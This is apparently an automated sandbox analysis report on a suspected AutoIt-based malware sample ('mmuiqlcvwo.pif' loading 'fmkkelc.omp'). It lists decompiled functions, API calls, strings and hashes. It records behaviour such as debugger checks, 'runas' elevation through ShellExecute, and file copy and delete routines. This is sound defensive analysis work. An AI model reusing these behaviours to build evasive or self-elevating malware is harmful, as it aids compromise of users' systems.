Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: Shell.Explorer$about:blank
API String ID: 0-874089819
Opcode ID: 32ede42478347b5b15bf913c46b1c2d7c901b33f0de2a90d1f1041f45303b395
Instruction ID: 6d7ecfdc821ee50053e1d6a3cff804232ad8467f81cffabd0043f08fa45f9ccd
Opcode Fuzzy Hash: 32ede42478347b5b15bf913c46b1c2d7c901b33f0de2a90d1f1041f45303b395
Instruction Fuzzy Hash: 27215E716A0706BFD704EFA4C899E26B768BF45310B04C12AA51D8B682DFB0EC71CB91

Uniqueness

Uniqueness Score: -1.00%

Function 002612D7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E002612D7(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, signed int _a28) {
				struct HWND__* _t20;
				struct HWND__* _t21;

				if(_a8 == 0x30) {
					E0026D6E4(0x2a0078, _a4);
				} else {
					_t27 = _a8 - 0x110;
					if(_a8 == 0x110) {
						E0026D70B(0x2a0078, _t27, _a4, _a20, _a28 & 1);
						if((_a28 & 0x00000001) != 0) {
							_t20 =  *0x29dfd4(_a4);
							if(_t20 != 0) {
								_t21 = GetDlgItem(_t20, 0x3021);
								if(_t21 != 0 && (_a28 & 0x00000008) != 0) {
									SetWindowTextW(_t21, 0x2922e4);
								}
							}
						}
					}
				}
				return 0;
			}

0x002612de
0x00261341
0x002612e0
0x002612e0
0x002612e7
0x002612fd
0x00261306
0x0026130b
0x00261313
0x0026131b
0x00261323
0x00261331
0x00261331
0x00261323
0x00261313
0x00261306
0x002612e7
0x00261349

APIs

Part of subcall function 0026D70B: _swprintf.LIBCMT ref: 0026D731
Part of subcall function 0026D70B: _strlen.LIBCMT ref: 0026D752
Part of subcall function 0026D70B: SetDlgItemTextW.USER32(?,0029D154,?), ref: 0026D7B2
Part of subcall function 0026D70B: GetWindowRect.USER32(?,?), ref: 0026D7EC
Part of subcall function 0026D70B: GetClientRect.USER32(?,?), ref: 0026D7F8

GetDlgItem.USER32(00000000,00003021), ref: 0026131B
SetWindowTextW.USER32(00000000,002922E4), ref: 00261331

Strings

0, xrefs: 002612DA

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 0
API String ID: 2622349952-4108050209
Opcode ID: 334251996293b8e39a0cc95087d4c660728baf222d1ffa8e51bf6a0c34bab69f
Instruction ID: dfa52e38088a87b0dddb0dc9fecce87e294dfe0ebdd3e944718781704117a114
Opcode Fuzzy Hash: 334251996293b8e39a0cc95087d4c660728baf222d1ffa8e51bf6a0c34bab69f
Instruction Fuzzy Hash: 37F0C27056028DA7DF250F20DC4ABE93B59AF05344F088055FC4A91AA1CB78E9F4EB20

Uniqueness

Uniqueness Score: -1.00%

Function 002704BA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E002704BA(void* __ecx, void* __ebp, void* _a4) {
				void* __esi;
				long _t2;
				void* _t6;

				_t6 = __ecx;
				_t2 = WaitForSingleObject(_a4, 0xffffffff);
				if(_t2 == 0xffffffff) {
					_push(GetLastError());
					return E00266CC9(E00266CCE(_t6, 0x2a00e0, L"\nWaitForMultipleObjects error %d, GetLastError %d", 0xffffffff), 0x2a00e0, 0x2a00e0, 2);
				}
				return _t2;
			}

0x002704ba
0x002704c0
0x002704c9
0x002704d2
0x00000000
0x002704f1
0x002704f2

APIs

WaitForSingleObject.KERNEL32(?,000000FF,002705D9,?,?,0027064E,?,?,?,?,?,00270638), ref: 002704C0
GetLastError.KERNEL32(?,?,0027064E,?,?,?,?,?,00270638), ref: 002704CC

Part of subcall function 00266CCE: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00266CEC

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 002704D5

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: 3ca4ce55fa6ce3ac824604c37914b6a21219a9ece1a4570beee1f7cb7ce44c6f
Instruction ID: 1a962562cf9f09317329411414f849ceffa94fe6de31ab7051c0118ff0ed5810
Opcode Fuzzy Hash: 3ca4ce55fa6ce3ac824604c37914b6a21219a9ece1a4570beee1f7cb7ce44c6f
Instruction Fuzzy Hash: 7CD05B31565431F7D6002724AC0EE6E75169B13330F64871AF539552F5CE200CB985D5

Uniqueness

Uniqueness Score: -1.00%

Function 0026D6C1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0026D6C1(void* __ecx) {
				struct HRSRC__* _t3;
				void* _t5;

				_t5 = __ecx;
				_t3 = FindResourceW(GetModuleHandleW(0), L"RTL", 5);
				if(_t3 != 0) {
					 *((char*)(_t5 + 0x64)) = 1;
					return _t3;
				}
				return _t3;
			}

0x0026d6c4
0x0026d6d4
0x0026d6dc
0x0026d6de
0x00000000
0x0026d6de
0x0026d6e3

APIs

GetModuleHandleW.KERNEL32(00000000,?,0026CFBE,?), ref: 0026D6C6
FindResourceW.KERNEL32(00000000,RTL,00000005,?,0026CFBE,?), ref: 0026D6D4

Strings

RTL, xrefs: 0026D6CE

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: 82c649d27764561358ff24d729e5a42c3a34d1af184feff154abbbc76e428bee
Instruction ID: 4eef2ffb5ac5be94f6a272c31205a10d80335fcd1f820caaefb29c1252ab5e3e
Opcode Fuzzy Hash: 82c649d27764561358ff24d729e5a42c3a34d1af184feff154abbbc76e428bee
Instruction Fuzzy Hash: 13C01231796312B6EB301B30BC0DB833A4C6B21B12F19044AF285DA1D0DAA6C898C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 0028AB56, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0028AB56() {

				 *0x2c0868 = GetCommandLineA();
				 *0x2c086c = GetCommandLineW();
				return 1;
			}

0x0028ab5c
0x0028ab67
0x0028ab6e

APIs

GetCommandLineA.KERNEL32 ref: 0028AB56
GetCommandLineW.KERNEL32 ref: 0028AB61

Strings

h+3, xrefs: 0028AB5C

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: CommandLine
String ID: h+3
API String ID: 3253501508-1881530357
Opcode ID: 7c7a804884506f058c6f6db1f19d7ff418bb727e1c33f2a33c3271522ca60c2d
Instruction ID: 0f8912998108d7307e4fe7a48451a5a132dba35dfb31c30d21644eeea91dbc0e
Opcode Fuzzy Hash: 7c7a804884506f058c6f6db1f19d7ff418bb727e1c33f2a33c3271522ca60c2d
Instruction Fuzzy Hash: 5DB09278800204DFC7448FB2B88C8043BF0F3083023C28297D809C2320D635008DCF80

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: mmuiqlcvwo.pif PID: 2516 Parent PID: 2860 mmuiqlcvwo.pifCOMMON

Executed Functions

Function 00FB98F0, Relevance: 40.9, APIs: 21, Strings: 1, Instructions: 2413COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00FB9911

Part of subcall function 00FC14F7: _malloc.LIBCMT ref: 00FC1511

_memmove.LIBCMT ref: 00FB995C

Part of subcall function 00FC14F7: std::exception::exception.LIBCMT ref: 00FC1546
Part of subcall function 00FC14F7: std::exception::exception.LIBCMT ref: 00FC1560
Part of subcall function 00FC14F7: __CxxThrowException@8.LIBCMT ref: 00FC1571

CharUpperBuffW.USER32(?,?), ref: 00FB99A3
_memmove.LIBCMT ref: 00FB9FE6
_memmove.LIBCMT ref: 00FBA914
_memmove.LIBCMT ref: 00FD9769

Strings

H/n, xrefs: 00FB9E94, 00FB9F3E, 00FBA08C, 00FBA12D, 00FBA191

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
String ID: H/n
API String ID: 2383988440-970879320
Opcode ID: 4398b3e1f655a6a4769fefbf870d6197e5ce9e6fca90761396c4ffc8207264ca
Instruction ID: 41e3a0bad896302fec904171d372812200cff3cbefab56f2f8bd99eb6b9b3070
Opcode Fuzzy Hash: 4398b3e1f655a6a4769fefbf870d6197e5ce9e6fca90761396c4ffc8207264ca
Instruction Fuzzy Hash: 17138D75A08201CFC724DF29C881B6AB7E2BF85310F28895EE4868B351D775EC45EF92

Uniqueness

Uniqueness Score: -1.00%

Function 00FFBCB3, Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 178filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00FBF220: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\33920049\fmkkelc.omp,00FBF1F5,C:\Users\user\33920049\fmkkelc.omp,010590E8,C:\Users\user\33920049\fmkkelc.omp,?,00FBF1F5,?,?,00000001), ref: 00FBF23C

Part of subcall function 00FE38ED: __wsplitpath.LIBCMT ref: 00FE3913
Part of subcall function 00FE38ED: __wsplitpath.LIBCMT ref: 00FE3935
Part of subcall function 00FE38ED: __wcsicoll.LIBCMT ref: 00FE3959

Part of subcall function 00FE397D: GetFileAttributesW.KERNEL32(?), ref: 00FE3984

_wcscat.LIBCMT ref: 00FFBD20
_wcscat.LIBCMT ref: 00FFBD49
__wsplitpath.LIBCMT ref: 00FFBD76
FindFirstFileW.KERNEL32(?,?), ref: 00FFBD8E
_wcscpy.LIBCMT ref: 00FFBDFD
_wcscat.LIBCMT ref: 00FFBE0F
_wcscat.LIBCMT ref: 00FFBE21
lstrcmpiW.KERNEL32(?,?), ref: 00FFBE4D
DeleteFileW.KERNEL32(?), ref: 00FFBE5F
MoveFileW.KERNEL32 ref: 00FFBE7F
CopyFileW.KERNEL32(?,?,00000000), ref: 00FFBE96
DeleteFileW.KERNEL32(?), ref: 00FFBEA1
CopyFileW.KERNEL32(?,?,00000000), ref: 00FFBEB8
FindClose.KERNEL32(00000000), ref: 00FFBEBF
MoveFileW.KERNEL32 ref: 00FFBEDB
FindNextFileW.KERNEL32(00000000,00000010), ref: 00FFBEF0
FindClose.KERNEL32(00000000), ref: 00FFBF08

Strings

\*.*, xrefs: 00FFBD1A, 00FFBD43

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
String ID: \*.*
API String ID: 2188072990-1173974218
Opcode ID: d612c7646330f9f23e7c073e0bbd187e0e021e05b5d466143e08d3d87b1b6d11
Instruction ID: 224b63dfeb38c257da1e1aed5a44a65748ccd73ce316d2805e61c132a82cbe37
Opcode Fuzzy Hash: d612c7646330f9f23e7c073e0bbd187e0e021e05b5d466143e08d3d87b1b6d11
Instruction Fuzzy Hash: 835151B2408384AAC734DBA0DC85EEF73ECAF95310F448A1DF68982051EB75D649D7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00FB35F0, Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 359COMMON

Download Yara Rule

APIs

Part of subcall function 00FB1D10: _wcslen.LIBCMT ref: 00FB1D11
Part of subcall function 00FB1D10: _memmove.LIBCMT ref: 00FB1D57

GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00FB3681
GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00FB3697
__wsplitpath.LIBCMT ref: 00FB36C2

Part of subcall function 00FC392E: __wsplitpath_helper.LIBCMT ref: 00FC3970

_wcscpy.LIBCMT ref: 00FB36D7
_wcscat.LIBCMT ref: 00FB36EC
SetCurrentDirectoryW.KERNEL32(?), ref: 00FB36FC

Part of subcall function 00FC14F7: _malloc.LIBCMT ref: 00FC1511

Part of subcall function 00FC14F7: std::exception::exception.LIBCMT ref: 00FC1546
Part of subcall function 00FC14F7: std::exception::exception.LIBCMT ref: 00FC1560
Part of subcall function 00FC14F7: __CxxThrowException@8.LIBCMT ref: 00FC1571

Part of subcall function 00FB3D20: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,00FB378C,?,?,?,00000010), ref: 00FB3D38
Part of subcall function 00FB3D20: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00FB3D71

_wcscpy.LIBCMT ref: 00FB37D0
_wcslen.LIBCMT ref: 00FB3853
_wcslen.LIBCMT ref: 00FB38AD

Strings

#include depth exceeded. Make sure there are no recursive includes, xrefs: 00FD817E
Unterminated string, xrefs: 00FD82C6
_, xrefs: 00FB394C
Error opening the file, xrefs: 00FD81AF

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
API String ID: 3393021363-188983378
Opcode ID: 57d6ca96abbd4cb796fe11d7a86a59975f50fb60b152ff04021d350b3d30d1ad
Instruction ID: 70d2346bb1d852c7951656a8d3b7b67028dc8a5fd6e89d929916f750983b65d7
Opcode Fuzzy Hash: 57d6ca96abbd4cb796fe11d7a86a59975f50fb60b152ff04021d350b3d30d1ad
Instruction Fuzzy Hash: 5AD1C1B2548341AAD711EF65CC41BEBB7E9AF85340F04482EF5C543201DB79DA49EBA3

Uniqueness

Uniqueness Score: -1.00%

Function 00FBD7A0, Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00FBD7BA

Part of subcall function 00FB2190: __wcsicoll.LIBCMT ref: 00FB2262
Part of subcall function 00FB2190: __wcsicoll.LIBCMT ref: 00FB2278
Part of subcall function 00FB2190: __wcsicoll.LIBCMT ref: 00FB228E
Part of subcall function 00FB2190: __wcsicoll.LIBCMT ref: 00FB22A4
Part of subcall function 00FB2190: _wcscpy.LIBCMT ref: 00FB22C4

IsDebuggerPresent.KERNEL32 ref: 00FBD7C6
GetFullPathNameW.KERNEL32(C:\Users\user\33920049\fmkkelc.omp,00000104,?,01057F50,01057F54), ref: 00FBD82D

Part of subcall function 00FB16A0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00FB16E5

SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 00FBD8A2
MessageBoxA.USER32 ref: 00FDE14F
SetCurrentDirectoryW.KERNEL32(?), ref: 00FDE1A3
GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00FDE1D3
GetForegroundWindow.USER32 ref: 00FDE21D
ShellExecuteW.SHELL32(00000000), ref: 00FDE224

Part of subcall function 00FC03E0: GetSysColorBrush.USER32 ref: 00FC03EB
Part of subcall function 00FC03E0: LoadCursorW.USER32 ref: 00FC03FA
Part of subcall function 00FC03E0: LoadIconW.USER32 ref: 00FC0410
Part of subcall function 00FC03E0: LoadIconW.USER32 ref: 00FC0423
Part of subcall function 00FC03E0: LoadIconW.USER32 ref: 00FC0436
Part of subcall function 00FC03E0: LoadImageW.USER32 ref: 00FC045E
Part of subcall function 00FC03E0: RegisterClassExW.USER32(?), ref: 00FC04AD

Part of subcall function 00FC0350: CreateWindowExW.USER32 ref: 00FC0385
Part of subcall function 00FC0350: CreateWindowExW.USER32 ref: 00FC03AE
Part of subcall function 00FC0350: ShowWindow.USER32(?,00000000), ref: 00FC03C4
Part of subcall function 00FC0350: ShowWindow.USER32(?,00000000), ref: 00FC03CE

Part of subcall function 00FBE2C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00FBE3A7

Strings

It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00FDE148
C:\Users\user\33920049\fmkkelc.omp, xrefs: 00FBD7F5, 00FBD823, 00FBD83A, 00FDE1EC
AutoIt, xrefs: 00FDE143
runas, xrefs: 00FDE218, 00FDE247

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: LoadWindow$Icon__wcsicoll$CurrentDirectoryName$CreateFullPathShow$BrushClassColorCursorDebuggerExecuteFileForegroundImageMessageModuleNotifyPresentRegisterShellShell__wcscpy
String ID: AutoIt$C:\Users\user\33920049\fmkkelc.omp$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
API String ID: 1688597619-3473133393
Opcode ID: f7c41456082f54aec8a5c19f23f13a03a2a3806993a1dadf53c78562615d29b1
Instruction ID: fc8a93e64694dc2bd2cf7db46672ff0722db1b19a3a956bb4a2147a324d20ec6
Opcode Fuzzy Hash: f7c41456082f54aec8a5c19f23f13a03a2a3806993a1dadf53c78562615d29b1
Instruction Fuzzy Hash: 23415C71A04344ABDB60F7A1DC45BEB377CAB48315F444489FAC55B241DB7D4988EF21

Uniqueness

Uniqueness Score: -1.00%

Function 00FE3EC5, Relevance: 10.6, APIs: 7, Instructions: 78processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00FE3EE2
Process32FirstW.KERNEL32(00000000,0000022C), ref: 00FE3EF2
Process32NextW.KERNEL32(00000000,0000022C), ref: 00FE3F1D
__wsplitpath.LIBCMT ref: 00FE3F48

Part of subcall function 00FC392E: __wsplitpath_helper.LIBCMT ref: 00FC3970

_wcscat.LIBCMT ref: 00FE3F5B
__wcsicoll.LIBCMT ref: 00FE3F6B
CloseHandle.KERNEL32(00000000), ref: 00FE3FA4

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
String ID:
API String ID: 2547909840-0
Opcode ID: ef92d25e6300f6dfb42a3d703c88f1c78e002939cf53e9b4dfacc352cd418788
Instruction ID: 4a8f5595e1d7e9d41e9c4cec154136f443098364b6235fc2fe9540a18ca76a67
Opcode Fuzzy Hash: ef92d25e6300f6dfb42a3d703c88f1c78e002939cf53e9b4dfacc352cd418788
Instruction Fuzzy Hash: E421D676C00259ABCB25DF90CC8CFEAB7B8AB48300F00819DF54997141EB75AB85DF60

Uniqueness

Uniqueness Score: -1.00%

Function 00FBEE30, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(uxtheme.dll), ref: 00FBEE3B
GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 00FBEE4D

Strings

IsThemeActive, xrefs: 00FBEE47
uxtheme.dll, xrefs: 00FBEE36

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: IsThemeActive$uxtheme.dll
API String ID: 2574300362-3542929980
Opcode ID: 9c71135ee9bb80637f6433e0b321bdeb5b5ebbf5a778d8c1dc7288c05afc3d06
Instruction ID: 25da1cca2009189061c5db54b34e29cb99214aead52b091968cca6c6108da2b0
Opcode Fuzzy Hash: 9c71135ee9bb80637f6433e0b321bdeb5b5ebbf5a778d8c1dc7288c05afc3d06
Instruction Fuzzy Hash: 95D0C9B4D00703DAD7301F23D41964277E8AB40B55F11881CA5D1D5204DB78D4809B34

Uniqueness

Uniqueness Score: -1.00%

Function 00FE399B, Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00000000), ref: 00FE39AC
FindFirstFileW.KERNEL32(?,?), ref: 00FE39BD
FindClose.KERNEL32(00000000), ref: 00FE39D0

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 9f40396042ef30fac3a741d8f50a04fc6f771081f28b3c5a067aaf68f64bac81
Instruction ID: 99c97a887eeca5bd4bebf511b48365d83e09f45e7a6473b6c4e0ef5123d70f4d
Opcode Fuzzy Hash: 9f40396042ef30fac3a741d8f50a04fc6f771081f28b3c5a067aaf68f64bac81
Instruction Fuzzy Hash: AEE092368145149B8620AA78BC0D4E9779DDF06335F000742FE78C31D0D7759A9057D6

Uniqueness

Uniqueness Score: -1.00%

Function 00FCF170, Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00FCF175

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: d630098ebd82e2c6e19806dcf9e1983e70fd77ebfa6000a165631e7780a8775b
Instruction ID: 13485ba1373ffd381b7e9f82ad1a8e9779fda1315b85aab954d5989498c8dee2
Opcode Fuzzy Hash: d630098ebd82e2c6e19806dcf9e1983e70fd77ebfa6000a165631e7780a8775b
Instruction Fuzzy Hash: 3190027465110296471417B09A0AA4565955B5860274544687141C8448DA55800CA712

Uniqueness

Uniqueness Score: -1.00%

Function 00FB3C50, Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 238COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00FD8392

Strings

#OnAutoItStartRegister, xrefs: 00FD83F1
#notrayicon, xrefs: 00FD838A
#requireadmin, xrefs: 00FD83AD
#ce, xrefs: 00FD85C3
Unterminated group of comments, xrefs: 00FD8602
#cs, xrefs: 00FD8549, 00FD859B
Cannot parse #include, xrefs: 00FD851F
#comments-start, xrefs: 00FD8535, 00FD8587
#include-once, xrefs: 00FD8465
#include, xrefs: 00FD84C5
#NoAutoIt3Execute, xrefs: 00FD83CF
#comments-end, xrefs: 00FD85AF

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
